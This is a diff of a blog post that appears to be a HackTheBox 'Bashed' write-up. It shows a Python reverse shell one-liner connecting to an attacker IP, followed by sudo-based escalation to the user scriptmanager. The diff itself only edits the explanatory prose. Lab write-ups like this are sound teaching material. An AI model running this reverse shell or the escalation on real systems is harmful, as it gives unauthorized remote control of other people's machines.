rax-register/rax-register.github.io/_posts/2020-07-09-htb-bashed.md

     python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.24",17011));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

-A note here: Bashed is an older machine so it is fine to default to using python.
+A note here: Bashed is an older machine so it is fine to default to using "python" which is normally symlinked to python2.
 In newer machines you will want to specify "python3" instead as python2 is deprecated.

 ![](/images/bashed/13. nc_connection.png "nc connection")

-Good to go, we have a shell!
+We have a shell!
 Let's check if we can sudo anything:

 ![](/images/bashed/14. sudo-l.png "sudo -l")

 And we can!
-We can run pretty much anything as the user scriptmanager...which probably has more permissions than we do, so let's log ourselves in as scriptmanager:
+We can run any command as the user scriptmanager without a password.
+A dangerous misconfiguration for sure.
+Since user scriptmanager probably has more permissions than user www-data, let's log ourselves in as scriptmanager:

     sudo -u scriptmanager bash -i